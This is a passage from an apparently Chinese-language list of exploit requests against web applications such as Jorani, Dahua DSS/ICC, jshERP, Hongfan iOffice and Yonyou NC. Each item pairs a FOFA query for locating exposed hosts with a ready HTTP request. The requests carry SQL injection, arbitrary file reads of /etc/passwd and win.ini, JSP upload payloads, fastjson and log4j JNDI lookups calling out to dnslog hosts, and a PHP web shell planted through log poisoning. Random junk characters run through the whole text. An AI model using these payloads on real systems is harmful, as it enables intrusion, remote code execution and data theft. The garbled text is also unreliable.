User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; o0 Y) f$ G2 |& _. Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) V/ F: b- s2 E; b- `Accept-Encoding: gzip, deflate8 y4 x; Q) M0 |% p
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8) A0 V, j( ^7 m* ?6 j
Connection: close# B, h0 P- G8 Q+ E
( T2 ^; ^: j; j% n5 W! h, x- G0 x! s
12. Jorani < 1.0.2 远程命令执行
5 F2 p( k' U8 }2 y- l# W; Y: xFOFA:title="Jorani"
" F* a( r& x( Z第一步先拿到cookie, o/ _# x' Y' U' ~+ i( Y2 [+ G
GET /session/login HTTP/1.1. G# K$ t: w9 L( G# }+ ^
Host: 192.168.190.30
5 Q# m3 s. _! t$ @/ P! gUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
2 N: N4 o3 L! a& b9 t- ?Connection: close
# U- l. L, I0 m% p3 EAccept-Encoding: gzip
" Z. T* n3 w* P' X2 i; o2 o- f4 x
4 t0 _3 g& c" u8 L响应中csrf_cookie_jorani用于后续请求7 e3 \# { j7 A4 S# d8 M4 j( P
HTTP/1.1 200 OK$ z4 i3 f% v( M$ U! [/ }
Connection: close* ?4 h5 [& s- h4 v3 t) n
Cache-Control: no-store, no-cache, must-revalidate M! p4 j/ v6 e& b" |
Content-Type: text/html; charset=UTF-8; l# m6 D7 u# u) [3 n: V
Date: Tue, 24 Oct 2023 09:34:28 GMT
4 [; ^( J0 X( L4 _3 I0 r! mExpires: Thu, 19 Nov 1981 08:52:00 GMT& p7 ]) L u* g( L7 Q( T
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
& O6 w* L A! q" j1 HPragma: no-cache
) a- d2 s, N# uServer: Apache/2.4.54 (Debian) W6 j4 z4 I* h' i2 q: J6 C9 U J
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
& |) k* X3 n$ L/ v; o! ISet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
' M# o8 o$ Q3 `Vary: Accept-Encoding
/ d; q8 l+ Z! }% M, D+ l8 T& h4 N; |" i* m% g6 ?1 f
0 B. ?% V6 z1 ]$ a" u2 y# h* Y" RPOST请求,执行函数并进行base64编码
* {5 K' g$ C: {9 X( k3 l' y+ o$ OPOST /session/login HTTP/1.1( J$ Y, [8 @$ Q& z7 \: S: V
Host: 192.168.190.308 J+ y D8 z8 W( O3 ^. c; }9 V+ y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.366 U t+ t+ b* V2 k: ] u( z
Connection: close: I; ?% Z! ~2 ^, D* y0 @, [
Content-Length: 252; {( M: J4 w* S( @3 z
Content-Type: application/x-www-form-urlencoded
) x% M' f9 L; O' S$ S& {1 |2 vCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; r: s, R7 ?/ p6 W$ a$ P# C
Accept-Encoding: gzip1 ^9 C2 m/ K/ U$ X3 `
# i# o9 A- f) z8 h6 Z
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor' V# ` D5 R8 ?1 t+ O. d/ N6 k
e* l, v& Z& t6 K
; M; b/ k: P* x: O
' A9 F. i; ~# X l1 R2 M向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串9 ^1 d. c7 s4 w5 q0 M- L" f$ Z! I
GET /pages/view/log-2023-10-24 HTTP/1.1) h, Q% q; t; r, p3 d5 @/ n' o
Host: 192.168.190.30
. Q5 X& b( L6 e8 m! GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ G4 w6 J) X# ^* X3 x9 |Connection: close* t, \( J" {8 s) Z1 D/ W
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r1 m% K& |0 n- z- j0 D& S
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=3 [# \) T8 G6 s. f" {$ C5 N
X-REQUESTED-WITH: XMLHttpRequest
3 |7 `6 i. V" U& cAccept-Encoding: gzip
$ B8 S2 c' x; j* B9 N: a
8 Q0 e* h/ w, K# A1 `& x1 w* }; m9 J; F. Z3 Y# q( i1 l
13. 红帆iOffice ioFileDown任意文件读取
" H' J0 ?5 _. B% NFOFA:app="红帆-ioffice"
9 n5 }: ^) [! hGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.11 l9 L! `/ |0 s+ A& P1 {
Host: x.x.x.x
' ?9 z+ k7 g- UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 |8 {6 g. }' C) o3 J
Connection: close
8 Z# j: u; g' F' z, B( p: OAccept: */*( y2 [9 Q6 l; ^& [! h
Accept-Encoding: gzip
' {4 L; ~ \! s& D' s5 ]. ]1 O, E6 @& d. M; ^( I
4 e" _( O% b& O, v14. 华夏ERP(jshERP)敏感信息泄露
$ {2 H/ y3 i* `; `' J. j% CFOFA:body="jshERP-boot"2 R* z) C) [/ I1 x3 e8 w
泄露内容包括用户名密码+ @) E! E2 o( \, y! H" @
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1: K% n# c/ ]$ O: Z4 X$ A7 v
Host: x.x.x.x: H) W% k7 k" ~- F* c7 x+ Y4 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
( O+ C9 I' J2 u% b$ z1 GConnection: close
( ~# W) o' L( `/ F7 vAccept: */*0 b' _2 j5 Z, B1 ?$ H4 }, V& b
Accept-Language: en( W5 {- g/ Y: F4 d" t1 l
Accept-Encoding: gzip: h8 v% B5 V. D- o" n7 ~ z' O& \5 j0 t
# [, D& K9 P$ H& a' t! C
w" z: }# n9 D15. 华夏ERP getAllList信息泄露# n& M# Q" P$ M3 M0 ?- ]8 C2 Y
CVE-2024-0490
9 F& v% X% Z8 d- t) q9 qFOFA:body="jshERP-boot"# y5 Q, S5 q/ u" p. [; m+ y8 m7 @
泄露内容包括用户名密码
* Q) t$ R }1 D9 d1 ~. k# BGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
& K* P P! x* v7 r) }Host: 192.168.40.130:100" ~6 {+ Z2 R& ^/ q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36' a3 z5 G/ J$ q: p! J6 z
Connection: close# V* q% H! E& L/ _* D/ G% C
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
) w4 _: Y9 e, _) S# {9 x( U0 G, pAccept-Language: en
9 B) w! y: U/ Usec-ch-ua-platform: Windows
0 X) A7 g+ H5 ^0 o6 I7 MAccept-Encoding: gzip& |: m! j9 P6 _: e" F* j( j, E. p6 Z
6 Y: M/ k) x$ f4 @; }+ G* m5 Z" H3 N' s5 H+ Z
16. 红帆HFOffice医微云SQL注入
% ]+ o3 _/ a2 ^; Y+ Q) ZFOFA:title="HFOffice"
3 y. C2 o; ?/ a. C$ kpoc中调用函数计算1234的md5值5 e2 r, X/ y) S- H: i
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1" K1 p" E9 t+ i6 t# `
Host: x.x.x.x
2 Q9 P! @$ q+ \( b4 z& I* rUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
# q: k5 a5 B; O) uConnection: close- H* ^- O1 X5 Y( P6 q# {4 H
Accept: */* a6 I# M3 \4 {/ ^; [) D: ]' l
Accept-Language: en, c: f9 L" u) `% x* \& s0 v4 E, ]* z
Accept-Encoding: gzip
9 Z2 c1 p$ w& O- W2 X
" l7 m/ v: p1 Y. ?. ?' C8 j( b5 J1 M; I1 R& |4 n3 E6 c
17. 大华 DSS itcBulletin SQL 注入& ~, m/ V2 \5 X* _# P) ~
FOFA:app="dahua-DSS"
: \/ {- G s# F% ?, EPOST /portal/services/itcBulletin?wsdl HTTP/1.1
% |* T# }" B q$ b1 q& |* A$ bHost: x.x.x.x
* C+ i7 t) H# j4 b! w5 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' {' N' M' }1 R% F9 n- b+ D
Connection: close# c( F/ k2 ~5 v) N' j5 c6 ^' Q
Content-Length: 345. [+ @0 ^6 U+ K7 |. z) _7 q
Accept-Encoding: gzip, u5 p* s- v/ _+ ^8 V0 @- g
# b: @0 E+ \, i& M/ H" ?* {
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
4 ^/ X, J+ p4 {+ W, k<s11:Body>7 b' \, ]; c ]" R! a6 X+ y' b: P
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>! h$ |( ^' L6 v7 V
<netMarkings>% S" }. m6 k' v- O a) }! v$ f5 B( n
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1! n" K& f; h8 ?- s
</netMarkings>
* _& p! M. a h* b3 U </ns1:deleteBulletin>
! K; ^5 h) C% N8 Y- m. H </s11:Body>0 f3 R6 ] y. T& M, o
</s11:Envelope>+ d) c/ r' s2 q
0 z; Q# ^' f" F; A
5 b% n; G7 g$ Z4 F* E
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露$ T+ A. u. t& V+ ]* @; _8 J
FOFA:app="dahua-DSS"+ k: K7 _: e, r! `! F
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.16 e: i6 ]9 a: j0 I
Host: your-ip4 N% H6 A% ~# N# \+ e; A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ O4 P+ m: d' {2 O
Accept-Encoding: gzip, deflate5 F# v3 y& B' E4 j
Accept: */*
8 b! u, \( Q& S7 X& XConnection: keep-alive& a1 {; w, @. F" \) R3 U0 W
n, S8 I- l6 k" T: A9 @
3 J0 L" b; h5 N8 \) {
' \* ?- [9 u. ~# w/ J+ Y! H19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入, H4 [: d4 {: B* B
FOFA:app="dahua-DSS"2 m- c$ f' d* R
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
! N) u- r1 f( Y; u( i+ E. ^; o7 vHost:
6 c- x' D8 I$ `" N/ |8 oUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- e/ N3 x% F% ]
Accept-Encoding: gzip, deflate
9 X$ s" D7 V0 yAccept: */*2 V+ g$ |; I3 j: v3 D
Connection: keep-alive1 `. ?2 f* Z" e+ \, c% c# f
: G: o& W0 z+ k* Z% F8 O, h" y3 t
! }7 C+ S0 @ y( F. y! _7 e6 p
20. 大华ICC智能物联综合管理平台任意文件读取5 D' l" q1 J; c" k
FOFA:body="*客户端会小于800*"
3 a2 h6 W F7 VGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
0 v( S8 r! p* l0 u+ l- Q/ v1 xHost: x.x.x.x
H( q& g# x; }. P3 J+ J8 p& dUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# w7 J# \% U, o; q2 kConnection: close+ O0 p4 P3 S1 U% U( c* i
Accept: */*6 t8 D) j2 U! j: V: I- ]& Z
Accept-Language: en* w; {2 C6 D, B$ U" i, T0 L6 T
Accept-Encoding: gzip
! n- ~3 _# B$ w1 {: {
% G0 |) @2 s& F& [" d3 P/ A$ W4 p2 i- e. w
21. 大华ICC智能物联综合管理平台random远程代码执行9 [1 Y8 i" G% N4 G! b4 G
FOFA:icon_hash="-1935899595"
' z$ T+ N7 m5 |7 `& R. NPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.11 K8 u7 Q, a9 g# k+ M- k3 n
Host: x.x.x.x$ b6 t6 r9 H5 T, ?( i6 [+ z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 q- A* q/ X, n# DContent-Length: 161+ \0 C( ]; p9 T; {, d
Accept-Encoding: gzip$ L& R" V3 J. \% d; \' d# q' H
Connection: close7 B! e( I7 _% ?
Content-Type: application/json;charset=utf-8
" [. V/ S6 I; I4 w6 a* ^" ]. N' P2 f, _ n& B4 B
{9 [' U, l5 Z/ X0 V' j- N0 V# F
"a":{
8 b/ O# R$ |7 T5 y* B2 O. l0 ^1 z "@type":"com.alibaba.fastjson.JSONObject",
5 L- N5 K( S: p& |7 w3 `2 X {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
: w5 q: h6 W8 ]; i1 Y* |, l }""
& {) G& U/ v$ ?1 r- X}
2 f/ o# T. a1 _' ?' ]
( M. q- o3 j1 n; o3 _$ x. L
9 l) c1 c* g+ F* F1 y A( l! \1 T22. 大华ICC智能物联综合管理平台 log4j远程代码执行8 Y, O. x! P: U6 _# D
FOFA:icon_hash="-1935899595"
7 Q7 @% O" ^- _' v( kPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1( l0 r0 \3 ^* b f; I, n
Host: your-ip; b$ ?0 [9 |9 F( T) x" }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! b4 R! A" k+ u' ?8 ?1 M: L6 u
Content-Type: application/json;charset=utf-8
" C z" U" S& |; }
4 F' W& v: R% X$ m* k5 A{
7 {3 D4 A- v1 H- |3 w"loginName":"${jndi:ldap://dnslog}"
4 p8 F* G d: J" \) U; c}( t6 ~( W& x5 e8 K8 O
6 m# r9 l9 v3 ~
" U" u, ?# s6 Y. J4 Y x7 o1 ~2 J% ]" \3 g1 B& O0 z
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行- A/ I, A4 f, I) d
FOFA:icon_hash="-1935899595"# Y' P( J4 V3 g* x- C) D2 B: T
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
6 R q5 v% }8 Z1 ~/ kHost: your-ip; W) ` m5 L2 k% B0 D1 w s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ p/ Z& S& {, b# P
Content-Type: application/json;charset=utf-8
# X) d) v6 }5 l/ y6 F7 s. w) QAccept-Encoding: gzip5 k. B- N2 D) {4 o" r
Connection: close- o& y; a9 Y5 Z, z2 }
& V' X' ] e' h, [: H: m4 I
{
- ~0 g$ }" Z! e4 H! p9 y2 |; z Q "a":{
( C9 i2 Z/ u' U' F8 c "@type":"com.alibaba.fastjson.JSONObject",% | b. n( D6 h, J. v6 K' Z
{"@type":"java.net.URL","val":"http://DNSLOG"}
& d, T& v3 w" K7 S }""
; c! \, d9 m# P2 ~: U6 L [}8 i! N# d# L: v- r1 V7 o0 o
1 j! ` m1 u# A2 u, B( X
- U: @% w& |+ q, |& k24. 用友NC 6.5 accept.jsp任意文件上传% l6 z/ ?0 F1 Y6 {5 ^/ m# T* c% Q% a" e
FOFA:icon_hash="1085941792"
9 q, y7 ~* T+ o! x1 U2 g; x# ?POST /aim/equipmap/accept.jsp HTTP/1.1
; ~0 Q0 n, X! u) aHost: x.x.x.x
: E3 G! z/ e% z+ R2 F7 @User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36( J' }0 J- L2 }1 D! W
Connection: close" G4 b4 j r2 R. d6 d0 D
Content-Length: 4499 |- e3 u( j# s6 q
Accept: */*
7 f6 ^. B9 Z6 A, P! Y/ n# pAccept-Encoding: gzip6 C8 d9 n: D/ ]
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc( B) D7 N/ a% R2 `' y
: `6 `3 m r3 a. M+ o
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
" n- D4 |6 {7 ]) D8 TContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"3 L( S8 H3 o: S3 D# }* E/ q1 g/ P
Content-Type: text/plain( L4 J8 ^$ c1 ]) h4 u0 ]
& n- C8 h; y+ Y. W, D2 C
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
, w' O% ^* _9 J3 T9 e-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
3 h" G; g" ?# [( s2 q" L4 `/ SContent-Disposition: form-data; name="fname"; v; D+ Q' |4 \& t5 R
4 `! a2 v3 [: d$ C& f4 f# s
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
& s! l, N) K; I-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--+ F4 Z8 D# h/ I) @. s6 [# e$ Z9 U
5 J8 I0 Q) ?( Q2 M: O0 c9 H
3 C5 p" p1 l$ Z25. 用友NC registerServlet JNDI 远程代码执行0 |. s; N# ^7 @# |. O
FOFA:app="用友-UFIDA-NC"
' z6 ?- C6 ]/ {5 ?3 F' N A* [POST /portal/registerServlet HTTP/1.1* D4 i% @ K0 ]- S: w: J" z
Host: your-ip
) f, _9 D- H4 A% q9 B- I0 a+ EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
4 h- g: B$ V/ g- k3 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9& `! v7 h. t! @2 Q
Accept-Encoding: gzip, deflate, ]- g2 B" B$ q& m( x
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6& w( w% I& I) O' |) S
Content-Type: application/x-www-form-urlencoded H) A5 T3 d' l5 X% A
2 u) \+ L. x5 x6 b) K! h
type=1&dsname=ldap://dnslog
/ r7 Z: Z, P2 M2 Q' `9 Z" G6 @3 ?4 l/ ~5 [$ d
4 v4 P1 t& B3 A: N7 D9 q5 \ `2 v
7 m1 O4 p6 Y% }8 H8 F! ?3 V26. 用友NC linkVoucher SQL注入; O: W' u8 R% j2 `% }
FOFA:app="用友-UFIDA-NC"0 v2 ^: w' f" y3 j) O# M; x
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1) g9 O* ]% U' O; m
Host: your-ip
- R$ x6 c1 a6 d# C# m& p+ G/ OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' ]+ N& R, A# Q) Q2 s: F- h
Content-Type: application/x-www-form-urlencoded
* d9 M" c3 X% zAccept-Encoding: gzip, deflate
% P3 A5 B9 q# k# K% JAccept: */*. }6 K2 s' p. ~' y
Connection: keep-alive% _5 U: ~/ S1 o; P/ ]8 W
9 I/ o1 p9 z5 ?/ Q- O# O
5 F5 X9 h6 K8 }
27. 用友 NC showcontent SQL注入3 R) h' }) i4 R
FOFA:icon_hash="1085941792"
& w8 l: d' T9 ^ \- c4 b$ uGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
' q$ Z1 {0 }! S* i7 Y' u' kHost: your-ip
: t( o! V# ?& I; j$ I$ [8 |6 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 P/ Q8 B9 F V0 Q% I" x U: YAccept-Encoding: identity
/ m7 p4 B; Z! p) Z( m$ ?( r5 PConnection: close: n3 }( \. ~, S
Content-Type: text/xml; charset=utf-8
3 {# Z7 X1 |& q- @5 g, u) ^1 X& E) S# d
* z' {- g% t7 w" u8 ^8 P* d+ r28. 用友NC grouptemplet 任意文件上传
% a# a9 _" D4 w: uFOFA:icon_hash="1085941792"
1 Y) c6 A; `, T! ^; c5 ^POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
5 }1 o, T: i% m8 EHost: x.x.x.x
# E: H3 G: q+ O6 d. ~5 h) j$ jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
: [$ x* \' G4 {% d$ T, MConnection: close, C* A8 @. K: J& W. k1 I5 U
Content-Length: 268. B3 y; ]+ `0 a9 C$ }, A& O. }% C
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
9 g, E# m$ j. j$ Q1 a" RAccept-Encoding: gzip
9 {; }; j7 v& T& Q0 h. e, X3 J- z
3 O' ^1 m1 B% [7 c" s2 O; `------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk' Y5 J, L, k2 Q5 E) y6 I. q4 V
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"$ t! _: g6 v! ]
Content-Type: application/octet-stream
1 O: r7 P4 _1 e7 }1 W! {! H0 n% M, M) ]9 [
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
1 c( }5 j. c! R8 N------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
" B- j' s! M# ]4 p- i& H
- n* N9 h7 A" _
% F4 M: U7 ]% t) {. W6 a/ @' m! Z/uapim/static/pages/nc/head.jsp
0 N6 d' |4 V% m0 {8 | _7 V) G
) y) D8 `1 u5 M& }' h29. 用友NC down/bill SQL注入
- D6 E5 @! E0 r: D6 B8 t5 tFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
3 A Z. u1 D. ~# ZGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1! m5 ]2 C) u. A) h2 H
Host: your-ip
% V) l$ J& H- k$ Q, d0 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" c d* A4 Z7 mContent-Type: application/x-www-form-urlencoded
; I! ^; q; g4 l- e$ ]9 J; ?7 [+ X& |6 S3 FAccept-Encoding: gzip, deflate! N$ X2 y9 N6 J: j) n1 Z7 N6 r
Accept: */*9 @+ f7 A0 c( K* N; k: F, y7 O: l
Connection: keep-alive
f2 w4 [+ s7 s, E7 n
1 u) p; j. E- D$ Q# y
7 r+ F2 f" m- w1 v8 C# {1 ]0 W+ V30. 用友NC importPml SQL注入& v# G s _2 f& {+ N
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"0 B, k; w) I' L# S- p9 Y' n8 d
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
2 }; q" L! K1 R8 b2 H1 {8 Q2 hHost: your-ip
+ s2 x' u# c: @Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
7 Z$ [& x6 n$ @2 c$ @/ JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' { O H+ G) d6 ^$ I2 W6 q2 iConnection: close# [" B0 c, H/ b
) w4 u$ \% ]9 g- V* Y9 }
------WebKitFormBoundaryH970hbttBhoCyj9V
1 m2 M6 M. \9 E3 J8 _) qContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
: I1 K' U7 X) l) P8 k4 zContent-Type: image/jpeg
- W: C8 g( u) k' I: ^' D6 l------WebKitFormBoundaryH970hbttBhoCyj9V--
+ X4 Q5 q3 g- O9 ^) g, }; Q# v( s- M& C- q- t& Q/ W' z' q+ e
0 U8 Q0 ^0 [, w* @ y5 W8 \, \5 ?31. 用友NC runStateServlet SQL注入
. m/ V) v, }% u: [2 v6 E$ W/ fversion<=6.5 G _/ k' ^+ \6 N* s. _$ X
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"& M4 X* [ [2 L# k5 N" j' b$ t' |; k
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
8 J3 V7 m" s0 C/ DHost: host
0 r5 c+ p: d* p& \- v7 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
/ l3 g& c4 H6 s8 B$ xContent-Type: application/x-www-form-urlencoded
9 m5 G3 m/ s6 k3 _! w4 V9 L1 i9 G' d$ s; h3 |' x5 z, k4 U0 h" q
. }4 ?8 J4 d3 Y7 t h
32. 用友NC complainbilldetail SQL注入
$ e+ t. ?* e/ \- A; a" b3 }, eversion= NC633、NC65: Y( \, ~0 w$ o! o" Z, [( D/ s# a
FOFA:app="用友-UFIDA-NC"
3 e1 u. O' C; G$ H- S" KGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 v4 {+ n7 a) N0 hHost: your-ip
+ m$ U8 R; e1 }2 ?. Z K" bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; X$ Z, _ s$ L$ i( p1 |, i
Content-Type: application/x-www-form-urlencoded
2 Z; K+ O) A2 J- U( tAccept-Encoding: gzip, deflate
% E P. ~3 y% o5 D) KAccept: */*
3 {7 p# u, Z: |! iConnection: keep-alive
9 A, ^1 J# h5 W e* F# U, v8 ~; M1 j# Z5 o
1 t7 G/ V; R9 }; i
33. 用友NC downTax/download SQL注入
' w# x- A, T1 N4 H0 Xversion:NC6.5FOFA:app="用友-UFIDA-NC"8 k# u. n% P% c: w. p% N8 H ]3 w" P
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.17 k7 M) O; J1 O+ i
Host: your-ip2 P: ]8 t8 h' g! x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# o0 n0 f3 D, u) E2 ~. ZContent-Type: application/x-www-form-urlencoded
) B# T! w0 G* N, QAccept-Encoding: gzip, deflate: y: k5 t. U( `# v$ ]. g8 d
Accept: */*
/ J- o5 Z5 H, u( L% u D7 U6 V6 tConnection: keep-alive# f9 D2 ?: N$ G$ D
- w5 z; j9 \* c5 p% d- w4 e
8 y( l5 d& R8 r' w34. 用友NC warningDetailInfo接口SQL注入
4 r7 r6 c3 _3 W5 Y* v$ a0 IFOFA:app="用友-UFIDA-NC"
% R( y7 v5 {% K; i( N7 q$ pGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1/ a D: J# Q& K( }
Host: your-ip0 f- k. V; Y+ q' E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 _$ G' m W5 r- Z
Content-Type: application/x-www-form-urlencoded
5 f l0 f, e! _' iAccept-Encoding: gzip, deflate
1 U; L% {/ A9 y0 d% N: Q8 m% TAccept: */*( N3 k" I" \6 v+ {* z+ e: n
Connection: keep-alive
$ w1 Y( n! n" ], {# w$ ?9 Q. b1 t# U* ?6 t1 _! ]* T9 A
* r% x8 n ^5 N35. 用友NC-Cloud importhttpscer任意文件上传
8 K; h8 `4 U# x- {6 v9 ~FOFA:app="用友-NC-Cloud"4 e" c* p* b# w) z
